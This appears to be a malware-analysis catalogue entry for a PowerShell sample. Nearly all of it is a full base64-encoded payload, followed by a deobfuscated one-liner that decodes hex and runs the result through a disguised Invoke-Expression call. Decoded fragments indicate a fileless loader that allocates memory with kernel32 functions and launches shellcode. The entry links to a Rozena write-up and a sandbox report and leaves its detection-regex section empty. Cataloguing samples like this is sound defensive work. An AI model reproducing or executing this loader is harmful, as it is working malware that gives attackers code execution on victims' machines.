KAAtAEoAbwBJAG4AKAAoACcAMgA0ADQAOAA1ADcAMwAzADcANgA1ADEAMwAwADcANAA0ADUANQBhADUAYQA0ADIANABlADMAZAAyAGUAMgA4ADIAOAAyADcAMwA2ADIAMAAzADQAMgAwADMANAAyADAAMwA1ADIAMAAzADIAMgAwADMAMwAyADAAMwAxADIAMAAzADAAMgA3ADIAZAA3ADIANAA1ADcAMAA0AGMANAAxADYAMwA2ADUAMgA3ADUAYwA3ADcAMgBiADIANwAyAGMAMgA3ADcAYgAyADQANwBiADMAMAA3AGQANwBkADIANwAyAGQANwAyADYANQA1ADAANgBjADYAMQA0ADMANgA1ADIANwAyADAAMgA3ADIAYwAyADcAMgA3ADIAOQAyAGQANgA2ADIANwA2ADUAMgA3ADIAYwAyADcANwAwADIANwAyAGMAMgA3ADcANAAyADcAMgBjADIANwA3ADkAMgA3ADIAYwAyADcANgA0ADIANwAyAGMAMgA3ADIAZAAyADcAMgBjADIANwA2ADEAMgA3ADIAOQAyADAAMgBkADYAZAAyADAAMgA3ADUAYgA0ADQANgBjADYAYwA0ADkANgBkADcAMAA2AGYANwAyADcANAAyADgAMgAyADYAYgA2ADUANwAyADYAZQA2ADUANgBjADMAMwAzADIAMgBlADYANAA2AGMANgBjADIAMgAyADkANQBkADIAMAA3ADAANwA1ADYAMgA2AGMANgA5ADYAMwAyADAANwAzADcANAA2ADEANwA0ADYAOQA2ADMAMgAwADYANQA3ADgANwA0ADYANQA3ADIANgBlADIAMAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANQA2ADYAOQA3ADIANwA0ADcANQA2ADEANgBjADQAMQA2AGMANgBjADYAZgA2ADMAMgA4ADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADQAMQA2ADQANgA0ADcAMgA2ADUANwAzA
DcAMwAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA0ADcANwA1ADMANgA5ADcAYQA2ADUAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYANgA2AGMANAAxADYAYwA2AGMANgBmADYAMwA2ADEANwA0ADYAOQA2AGYANgBlADUANAA3ADkANwAwADYANQAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANgA2ADYAYwA1ADAANwAyADYAZgA3ADQANgA1ADYAMwA3ADQAMgA5ADMAYgA1AGIANAA0ADYAYwA2AGMANAA5ADYAZAA3ADAANgBmADcAMgA3ADQAMgA4ADIAMgA2AGIANgA1ADcAMgA2AGUANgA1ADYAYwAzADMAMwAyADIAZQA2ADQANgBjADYAYwAyADIAMgA5ADUAZAAyADAANwAwADcANQA2ADIANgBjADYAOQA2ADMAMgAwADcAMwA3ADQANgAxADcANAA2ADkANgAzADIAMAA2ADUANwA4ADcANAA2ADUANwAyADYAZQAyADAANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADQAMwA3ADIANgA1ADYAMQA3ADQANgA1ADUANAA2ADgANwAyADYANQA2ADEANgA0ADIAOAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANgBjADcAMAA1ADQANgA4ADcAMgA2ADUANgAxADYANAA0ADEANwA0ADcANAA3ADIANgA5ADYAMgA3ADUANwA0ADYANQA3ADMAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYANAA3ADcANQAzADcANAA2ADEANgAzADYAYgA1ADMANgA5ADcAYQA2ADUAMgBjADIAMAA0ADkANgBlADcANAA1ADAANwA0ADcAMgAyADAANgBjADcAMAA1ADMANwA0ADYAMQA3ADIANwA0ADQAMQA2ADQANgA0ADcAMgA2ADUANwAzADcAMwAyAGMAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUAMAA2ADEANwAyADYAMQA2AGQANgA1ADcANAA2ADUANwAyADIAYwAyADAANwA1ADYAOQA2AGUANwA0ADIAMAA2ADQANwA3ADQAMwA3ADIANgA1ADYAMQA3ADQANgA5ADYAZgA2AGUANAA2ADYAYwA2ADEANgA3ADcAMwAyAGMAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGMANwAwADUANAA2ADgANwAyADYANQA2ADEANgA0ADQAOQA2ADQAMgA5ADMAYgA1AGIANAA0ADYAYwA2AGMANAA5ADYAZAA3ADAANgBmADcAMgA3ADQAMgA4ADIAMgA2AGQANwAzADcANgA2ADMANwAyADcANAAyAGUANgA0ADYAYwA2AGMAMgAyADIAOQA1AGQAMgAwADcAMAA3ADUANgAyADYAYwA2ADkANgAzADIAMAA3ADMANwA0ADYAMQA3ADQANgA5ADYAMwAyADAANgA1ADcAOAA3ADQANgA1ADcAMgA2AGUAMgAwADQAOQA2AGUANwA0ADUAMAA3ADQANwAyADIAMAA2AGQANgA1ADYAZAA3ADMANgA1ADcANAAyADgANAA5ADYAZQA3ADQANQAwADcANAA3ADIAMgAwADYANAA2ADUANwAzADcANAAyAGMAMgAwADcANQA2ADkANgBlADcANAAyADAANwAzADcAMgA2ADMAMgBjADIAMAA3ADUANgA5ADYAZQA3ADQAMgAwADYAMwA2AGYANwA1ADYAZQA3ADQAMgA5ADMAYgAyADcAMgAwADIAZAA2AGUANgAxADYAZAA2ADUAMgAwADIANwA1ADcANgA5ADYAZQAzADMAMwAyADIANwAyADAAMgBkADYAZQA3ADMAMgAwADUANwA2ADkANgBlADMAMwAzADIANAA2A
DcANQA2AGUANgAzADcANAA2ADkANgBmADYAZQA3ADMAMgAwADIAZAA3ADAANgAxADcAMwAzAGIANQBiADQAMgA3ADkANQA0ADQANQA1AGIANQBkADUAZAAyADQANQA5ADMAOAA0ADkANQAzADQANgA1ADIANgA3ADcAOQA1ADMAMwA1ADQANQA1AGEAMwBkADMAMAA3ADgANgA2ADYAMwAyAGMAMwAwADcAOAA2ADUAMwA4ADIAYwAzADAANwA4ADMAOAAzADIAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwA2ADMAMAAyAGMAMwAwADcAOAAzADgAMwA5ADIAYwAzADAANwA4ADYANQAzADUAMgBjADMAMAA3ADgAMwAzADMAMQAyAGMAMwAwADcAOAA2ADMAMwAwADIAYwAzADAANwA4ADMANgAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwAwADIAYwAzADAANwA4ADMAMwAzADAAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwAyADIAYwAzADAANwA4ADMAMAA2ADMAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADUAMwAyADIAYwAzADAANwA4ADMAMQAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADcAMwAyADIAYwAzADAANwA4ADMAMgAzADgAMgBjADMAMAA3ADgAMwAwADYANgAyAGMAMwAwADcAOAA2ADIAMwA3ADIAYwAzADAANwA4ADMANAA2ADEAMgBjADMAMAA3ADgAMwAyADMANgAyAGMAMwAwADcAOAAzADMAMwAxADIAYwAzADAANwA4ADYANgA2ADYAMgBjADMAMAA3ADgANgAxADYAMwAyAGMAMwAwADcAOAAzADMANgAzADIAYwAzADAANwA4ADMANgAzADEAMgBjADMAMAA3ADgAMwA3ADYAMwAyAGMAMwAwADcAOAAzADAAMwAyADIAYwAzADAANwA4ADMAMgA2ADMAMgBjADMAMAA3ADgAMwAyADMAMAAyAGMAMwAwADcAOAA2ADMAMwAxADIAYwAzADAANwA4ADYAMwA2ADYAMgBjADMAMAA3ADgAMwAwADYANAAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYAMwAzADcAMgBjADMAMAA3ADgANgA1ADMAMgAyAGMAMwAwADcAOAA2ADYAMwAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwA1ADMANwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADIAMgBjADMAMAA3ADgAMwAxADMAMAAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANAA2ADEAMgBjADMAMAA3ADgAMwAzADYAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANAA2ADMAMgBjADMAMAA3ADgAMwAxADMAMQAyAGMAMwAwADcAOAAzADcAMwA4ADIAYwAzADAANwA4ADYANQAzADMAMgBjADMAMAA3ADgAMwA0ADMAOAAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADEAMgBjADMAMAA3ADgAMwA1ADMAMQAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMANQAzADkAMgBjADMAMAA3ADgAMwAyADMAMAAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADMAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADQAMwA5A
DIAYwAzADAANwA4ADMAMQAzADgAMgBjADMAMAA3ADgANgA1ADMAMwAyAGMAMwAwADcAOAAzADMANgAxADIAYwAzADAANwA4ADMANAAzADkAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADMAMwA0ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAwADMAMQAyAGMAMwAwADcAOAA2ADQAMwA2ADIAYwAzADAANwA4ADMAMwAzADEAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADEANgAzADIAYwAzADAANwA4ADYAMwAzADEAMgBjADMAMAA3ADgANgAzADYANgAyAGMAMwAwADcAOAAzADAANgA0ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgAzADMANwAyAGMAMwAwADcAOAAzADMAMwA4ADIAYwAzADAANwA4ADYANQAzADAAMgBjADMAMAA3ADgAMwA3ADMANQAyAGMAMwAwADcAOAA2ADYAMwA2ADIAYwAzADAANwA4ADMAMAAzADMAMgBjADMAMAA3ADgAMwA3ADYANAAyAGMAMwAwADcAOAA2ADYAMwA4ADIAYwAzADAANwA4ADMAMwA2ADIAMgBjADMAMAA3ADgAMwA3ADYANAAyAGMAMwAwADcAOAAzADIAMwA0ADIAYwAzADAANwA4ADMANwAzADUAMgBjADMAMAA3ADgANgA1ADMANAAyAGMAMwAwADcAOAAzADUAMwA4ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAOAAyAGMAMwAwADcAOAAzADIAMwA0ADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMwAyAGMAMwAwADcAOAAzADYAMwA2ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAwADYAMwAyAGMAMwAwADcAOAAzADQANgAyADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwA1ADMAOAAyAGMAMwAwADcAOAAzADEANgAzADIAYwAzADAANwA4ADMAMAAzADEAMgBjADMAMAA3ADgANgA0ADMAMwAyAGMAMwAwADcAOAAzADgANgAyADIAYwAzADAANwA4ADMAMAAzADQAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADYANAAzADAAMgBjADMAMAA3ADgAMwA4ADMAOQAyAGMAMwAwADcAOAAzADQAMwA0ADIAYwAzADAANwA4ADMAMgAzADQAMgBjADMAMAA3ADgAMwAyADMANAAyAGMAMwAwADcAOAAzADUANgAyADIAYwAzADAANwA4ADMANQA2ADIAMgBjADMAMAA3ADgAMwA2ADMAMQAyAGMAMwAwADcAOAAzADUAMwA5ADIAYwAzADAANwA4ADMANQA2ADEAMgBjADMAMAA3ADgAMwA1ADMAMQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYANQAzADAAMgBjADMAMAA3ADgAMwA1ADYANgAyAGMAMwAwADcAOAAzADUANgA2ADIAYwAzADAANwA4ADMANQA2ADEAMgBjADMAMAA3ADgAMwA4ADYAMgAyAGMAMwAwADcAOAAzADEAMwAyADIAYwAzADAANwA4ADYANQA2ADIAMgBjADMAMAA3ADgAMwA4ADYANAAyAGMAMwAwADcAOAAzADUANgA0ADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgAMwAzADMAMwAyAGMAMwAwADcAOAAzADMAMwAyADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADYAMwA4A
DIAYwAzADAANwA4ADMANwAzADcAMgBjADMAMAA3ADgAMwA3ADMAMwAyAGMAMwAwADcAOAAzADMAMwAyADIAYwAzADAANwA4ADMANQA2ADYAMgBjADMAMAA3ADgAMwA1ADMANAAyAGMAMwAwADcAOAAzADYAMwA4ADIAYwAzADAANwA4ADMANAA2ADMAMgBjADMAMAA3ADgAMwA3ADMANwAyAGMAMwAwADcAOAAzADIAMwA2ADIAYwAzADAANwA4ADMAMAAzADcAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADQAMwA1ADIAYwAzADAANwA4ADYAMgAzADgAMgBjADMAMAA3ADgAMwA5ADMAMAAyAGMAMwAwADcAOAAzADAAMwAxADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADIAMwA5ADIAYwAzADAANwA4ADYAMwAzADQAMgBjADMAMAA3ADgAMwA1ADMANAAyAGMAMwAwADcAOAAzADUAMwAwADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgAMwAyADMAOQAyAGMAMwAwADcAOAAzADgAMwAwADIAYwAzADAANwA4ADMANgA2ADIAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYANAAzADUAMgBjADMAMAA3ADgAMwA2ADYAMQAyAGMAMwAwADcAOAAzADAAMwA1ADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgAMwAxADMAMgAyAGMAMwAwADcAOAA2ADUAMwA3ADIAYwAzADAANwA4ADMANwAzADkAMgBjADMAMAA3ADgANgAyADMAOQAyAGMAMwAwADcAOAAzADYAMwA4ADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADEAMgBjADMAMAA3ADgANgAyADYAMgAyAGMAMwAwADcAOAAzADgAMwA5ADIAYwAzADAANwA4ADYANQAzADYAMgBjADMAMAA3ADgAMwA1ADMAMAAyAGMAMwAwADcAOAAzADUAMwAwADIAYwAzADAANwA4ADMANQAzADAAMgBjADMAMAA3ADgAMwA1ADMAMAAyAGMAMwAwADcAOAAzADQAMwAwADIAYwAzADAANwA4ADMANQAzADAAMgBjADMAMAA3ADgAMwA0ADMAMAAyAGMAMwAwADcAOAAzADUAMwAwADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgANgA1ADYAMQAyAGMAMwAwADcAOAAzADAANgA2ADIAYwAzADAANwA4ADYANAA2ADYAMgBjADMAMAA3ADgANgA1ADMAMAAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYANAAzADUAMgBjADMAMAA3ADgAMwA5ADMANwAyAGMAMwAwADcAOAAzADYANgAxADIAYwAzADAANwA4ADMAMQAzADAAMgBjADMAMAA3ADgAMwA1ADMANgAyAGMAMwAwADcAOAAzADUAMwA3ADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgAMwA5ADMAOQAyAGMAMwAwADcAOAA2ADEAMwA1ADIAYwAzADAANwA4ADMANwAzADQAMgBjADMAMAA3ADgAMwA2ADMAMQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYANAAzADUAMgBjADMAMAA3ADgAMwA4ADMANQAyAGMAMwAwADcAOAA2ADMAMwAwADIAYwAzADAANwA4ADMANwAzADQAMgBjADMAMAA3ADgAMwAwADYAMwAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADMANAA2ADUAMgBjA
DMAMAA3ADgAMwAwADMAOAAyAGMAMwAwADcAOAAzADcAMwA1ADIAYwAzADAANwA4ADYANQA2ADMAMgBjADMAMAA3ADgAMwA2ADMAOAAyAGMAMwAwADcAOAA2ADYAMwAwADIAYwAzADAANwA4ADYAMgAzADUAMgBjADMAMAA3ADgANgAxADMAMgAyAGMAMwAwADcAOAAzADUAMwA2ADIAYwAzADAANwA4ADYANgA2ADYAMgBjADMAMAA3ADgANgA0ADMANQAyAGMAMwAwADcAOAAzADYANgAxADIAYwAzADAANwA4ADMAMAAzADAAMgBjADMAMAA3ADgAMwA2ADYAMQAyAGMAMwAwADcAOAAzADAAMwA0ADIAYwAzADAANwA4ADMANQAzADYAMgBjADMAMAA3ADgAMwA1ADMANwAyAGMAMwAwADcAOAAzADYAMwA4ADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgANgA0ADMAOQAyAGMAMwAwADcAOAA2ADMAMwA4ADIAYwAzADAANwA4ADMANQA2ADYAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADQAMwA1ADIAYwAzADAANwA4ADMAOAA2ADIAMgBjADMAMAA3ADgAMwAzADMANgAyAGMAMwAwADcAOAAzADYANgAxADIAYwAzADAANwA4ADMANAAzADAAMgBjADMAMAA3ADgAMwA2ADMAOAAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMAMQAzADAAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMANQAzADYAMgBjADMAMAA3ADgAMwA2ADYAMQAyAGMAMwAwADcAOAAzADAAMwAwADIAYwAzADAANwA4ADMANgAzADgAMgBjADMAMAA3ADgAMwA1ADMAOAAyAGMAMwAwADcAOAA2ADEAMwA0ADIAYwAzADAANwA4ADMANQAzADMAMgBjADMAMAA3ADgANgA1ADMANQAyAGMAMwAwADcAOAA2ADYANgA2ADIAYwAzADAANwA4ADYANAAzADUAMgBjADMAMAA3ADgAMwA5ADMAMwAyAGMAMwAwADcAOAAzADUAMwAzADIAYwAzADAANwA4ADMANgA2ADEAMgBjADMAMAA3ADgAMwAwADMAMAAyAGMAMwAwADcAOAAzADUAMwA2ADIAYwAzADAANwA4ADMANQAzADMAMgBjADMAMAA3ADgAMwA1ADMANwAyAGMAMwAwADcAOAAzADYAMwA4ADIAYwAzADAANwA4ADMAMAAzADIAMgBjADMAMAA3ADgANgA0ADMAOQAyAGMAMwAwADcAOAA2ADMAMwA4ADIAYwAzADAANwA4ADMANQA2ADYAMgBjADMAMAA3ADgANgA2ADYANgAyAGMAMwAwADcAOAA2ADQAMwA1ADIAYwAzADAANwA4ADMAMQAyAGMAMwAwADcAOAA2ADMAMwAzADIAYwAzADAANwA4ADMAMgAzADkAMgBjADMAMAA3ADgANgAzADMANgAyAGMAMwAwADcAOAAzADcAMwA1ADIAYwAzADAANwA4ADYANQA2ADUAMgBjADMAMAA3ADgANgAzADMAMwAzAGIAMgA0ADYANAA3ADgANwA1ADYAYwA3ADQANAAyADQAYQA2ADUANABmADYAMgA2AGQANQAzADMAZAAyADQANAA4ADUANwAzADMANwA2ADUAMQAzADAANwA0ADQANQA1AGEANQBhADQAMgA0AGUAMwBhADMAYQAyADgAMgA4ADIANwAzADEAMgAwADMANgAyADAAMwA0ADIAMAAzADMAMgAwADMANQAyADAAMwA3ADIAMAAzADAAMgAwADMANwAyADAAMwAwADIAMAAzADAAMgAwADMAOAAyADAAMwAyADIANwAyAGQANwAyADYANQA3ADAANgBjA
DQAMQA2ADMANgA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADcAMgA2ADUANQAwADYAYwA0ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANgBjADIANwAyAGMAMgA3ADcANgAyADcAMgBjADIANwA2ADMAMgA3ADIAYwAyADcANwA0ADIANwAyAGMAMgA3ADcAMgAyADcAMgBjADIANwA3ADUAMgA3ADIAYwAyADcANgA5ADIANwAyAGMAMgA3ADYAMQAyADcAMgBjADIANwA2AGYAMgA3ADIAOQAyAGUANgA5ADYAZQA1ADYANgBmADQAYgA2ADUAMgA4ADMAMAAyAGMANQBiADQAZAA2ADEANwA0ADYAOAA1AGQAMwBhADMAYQAyADgAMgA3ADcAYgAzADEANwBkADcAYgAzADAANwBkADIANwAyAGQANgA2ADIANwA2ADEANQA4ADIANwAyAGMAMgA3ADQAZAAyADcAMgA5ADIAZQA2ADkANgBlADcANgA2AGYANgBiADQANQAyADgAMgA0ADUAOQAzADgANAA5ADUAMwA0ADYANQAyADYANwA3ADkANQAzADMANQA0ADUANQBhADIAZQAyADgAMgA4ADIANwAzADQAMgAwADMAMwAyADAAMwAwADIAMAAzADUAMgAwADMAMQAyADAAMwAyADIANwAyAGQANwAyADQANQA1ADAANgBjADYAMQA2ADMANAA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADcAMgA0ADUANQAwADYAYwA0ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANgBlADIANwAyAGMAMgA3ADcANAAyADcAMgBjADIANwA2ADgAMgA3ADIAYwAyADcANgA1ADIANwAyAGMAMgA3ADYAYwAyADcAMgBjADIANwA2ADcAMgA3ADIAOQAyAGMAMwAwADcAOAAzADEAMwAwADMAMAAzADAAMgA5ADIAYwAzADAANwA4ADMAMwAzADAAMwAwADMAMAAyAGMAMwAwADcAOAAzADQAMwAwADIAOQAzAGIANgA2ADYAZgA3ADIAMgA4ADIANAA2AGUANABhADQAOQAzADIAMwAzADUAOQA2AGMANQBhADcAMgA1AGEANABhADcANQAzAGQAMwAwADMAYgAyADQANgBlADQAYQA0ADkAMwAyADMAMwA1ADkANgBjADUAYQA3ADIANQBhADQAYQA3ADUAMgAwADIAZAA2AGMANgA1ADIAMAAyADgAMgA0ADUAOQAzADgANAA5ADUAMwA0ADYANQAyADYANwA3ADkANQAzADMANQA0ADUANQBhADIAZQAyADgAMgA4ADIANwAzADEAMgAwADMAMgAyADAAMwAzADIAMAAzADQAMgAwADMAMAAyADAAMwA1ADIANwAyAGQANwAyADQANQA3ADAANABjADQAMQA2ADMANgA1ADIANwA1AGMANwA3ADIAYgAyADcAMgBjADIANwA3AGIAMgA0ADcAYgAzADAANwBkADcAZAAyADcAMgBkADUAMgA0ADUANwAwADQAYwA0ADEANAAzADQANQAyADcAMgAwADIANwAyAGMAMgA3ADIANwAyADkAMgBkADYANgAyADcANwA0ADIANwAyAGMAMgA3ADYAYwAyADcAMgBjADIANwA2ADUAMgA3ADIAYwAyADcANgBlADIANwAyAGMAMgA3ADYANwAyADcAMgBjADIANwA2ADgAMgA3ADIAOQAyAGQAMwAxADIAOQAzAGIAMgA0ADYAZQA0AGEANAA5ADMAMgAzADMANQA5ADYAYwA1AGEANwAyA
DUAYQA0AGEANwA1ADIAYgAyAGIAMgA5ADcAYgA1AGIANwA2ADQAZgA2ADkANAA0ADUAZAAyADQANAA4ADUANwAzADMANwA2ADUAMQAzADAANwA0ADQANQA1AGEANQBhADQAMgA0AGUAMwBhADMAYQAyADgAMgA3ADcAYgAzADAANwBkADcAYgAzADEANwBkADIANwAyAGQANgA2ADIANwA2AGQANgA1ADYAZAAyADcAMgBjADIANwA1ADMANgA1ADUANAAyADcAMgA5ADIAZQA0ADkANgBlADUANgA0AGYANABiADYANQAyADgANQBiADYAOQA0AGUANwA0ADUAMAA1ADQANwAyADUAZAAyADgAMgA0ADYANAA3ADgANwA1ADYAYwA3ADQANAAyADQAYQA2ADUANABmADYAMgA2AGQANQAzADIAZQA1ADQANgBmADQAOQA2AGUANwA0ADMAMwAzADIAMgA4ADIAOQAyAGIAMgA0ADYAZQA0AGEANAA5ADMAMgAzADMANQA5ADYAYwA1AGEANwAyADUAYQA0AGEANwA1ADIAOQAyAGMAMgA0ADUAOQAzADgANAA5ADUAMwA0ADYANQAyADYANwA3ADkANQAzADMANQA0ADUANQBhADUAYgAyADQANgBlADQAYQA0ADkAMwAyADMAMwA1ADkANgBjADUAYQA3ADIANQBhADQAYQA3ADUANQBkADIAYwAzADEAMgA5ADcAZAAzAGIAMgA0ADQAOAA1ADcAMwAzADcANgA1ADEAMwAwADcANAA0ADUANQBhADUAYQA0ADIANABlADMAYQAzAGEAMgA4ADIANwA3AGIAMwAxADcAZAA3AGIAMwAyADcAZAA3AGIAMwAwADcAZAAyADcAMgBkADYANgAyADcANAA1ADYAMQA0ADQAMgA3ADIAYwAyADcANAAzADcAMgA0ADUANgAxADcANAA2ADUANQA0ADIANwAyAGMAMgA3ADQAOAA3ADIAMgA3ADIAOQAyAGUANgA5ADYAZQA1ADYANgBmADQAYgA2ADUAMgA4ADMAMAAyAGMAMwAwADIAYwAyADQANgA0ADcAOAA3ADUANgBjADcANAA0ADIANABhADYANQA0AGYANgAyADYAZAA1ADMAMgBjADMAMAAyAGMAMwAwADIAYwAzADAAMgA5ADMAYgAyAGUAMgA4ADIAOAAyADcAMwA2ADIAMAAzADEAMgAwADMANAAyADAAMwAwADIAMAAzADEAMgAwADMANwAyADAAMwA2ADIAMAAzADUAMgAwADMAMwAyADAAMwAzADIAMAAzADIAMgA3ADIAZAA3ADIANgA1ADUAMAA2AGMANgAxADYAMwA2ADUAMgA3ADUAYwA3ADcAMgBiADIANwAyAGMAMgA3ADcAYgAyADQANwBiADMAMAA3AGQANwBkADIANwAyAGQANwAyADQANQA1ADAANABjADYAMQA2ADMANAA1ADIANwAyADAAMgA3ADIAYwAyADcAMgA3ADIAOQAyAGQANgA2ADIANwA3ADIAMgA3ADIAYwAyADcANwA0ADIANwAyAGMAMgA3ADcAMAAyADcAMgBjADIANwA2ADUAMgA3ADIAYwAyADcANgAxADIANwAyAGMAMgA3ADYAYwAyADcAMgBjADIANwA3ADMAMgA3ADIAYwAyADcAMgBkADIANwAyADkAMgAwADMAMQAzADAAMwAwADMAMAAzADAAMwAwACcALQBzAHAAbABpAHQAJwAoAD8APAA9AFwARwAuAHsAMgB9ACkAKAA/ACEAJAApACcAKQB8ACUAewBbAGMAbwBuAFYARQBSAFQAXQA6ADoAKAAnAFQAbwAnACsAJwBJAG4AVAAnACsAJwAxADYAJwApAC4ASQBOAHYAbwBLAEUAKAAoACQAXwApACwAMQA2ACkALQBhAHMAWwBjAGgAYQBSAF0AfQApACkAfAAmACgAJgAoACgAJwAyACAAMQAgA
DAAJwAtAHIAZQBQAGwAQQBjAGUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBlAHAAbABhAEMAZQAnACAAJwAsACcAJwApAC0AZgAnAG0AJwAsACcAYwAnACwAJwBnACcAKQAoACgAJwA1ACAANAAgADgAIAAxACAAMgAgADcAIAA2ACAANwAgADMAIAAwACAAOQAgADcAIAAxADAAIAAxADAAIAA1ACAAMQAgADQAJwAtAFIAZQBwAGwAQQBDAEUAJwBcAHcAKwAnACwAJwB7ACQAewAwAH0AfQAnAC0AUgBFAHAATABBAEMARQAnACAAJwAsACcAJwApAC0AZgAnAHAAJwAsACcAbwAnACwAJwBrACcALAAnAHgAJwAsACcAbgAnACwAJwBpACcALAAnAC0AJwAsACcAZQAnACwAJwB2ACcALAAnAHIAJwAsACcAcwAnACkAKQA=
```
Deobfuscated
```
-JoIn(('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'-split'(?<=\G.{2})(?!$)')|%{[conVERT]::('To'+'InT'+'16').INvoKE(($_),16)-as[chaR]}))|&(&(('2 1 0'-rePlAce'\w+','{${0}}'-ReplaCe' ','')-f'm','c','g')(('5 4 8 1 2 7 6 7 3 0 9 7 10 10 5 1 4'-ReplACE'\w+','{${0}}'-REpLACE' ','')-f'p','o','k','x','n','i','-','e','v','r','s'))
```

#### Regular Expressions
---

``
``

#### Resources
---

Technical write-ups:
* https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena

Sandbox reports:
* https://www.hybrid-analysis.com/sample/c23d6700e93903d05079ca1ea4c1e36151cdba4c5518750dc604829c0d7b80a7?environmentId=120

Notes:

--------------------------------------------------------------------------------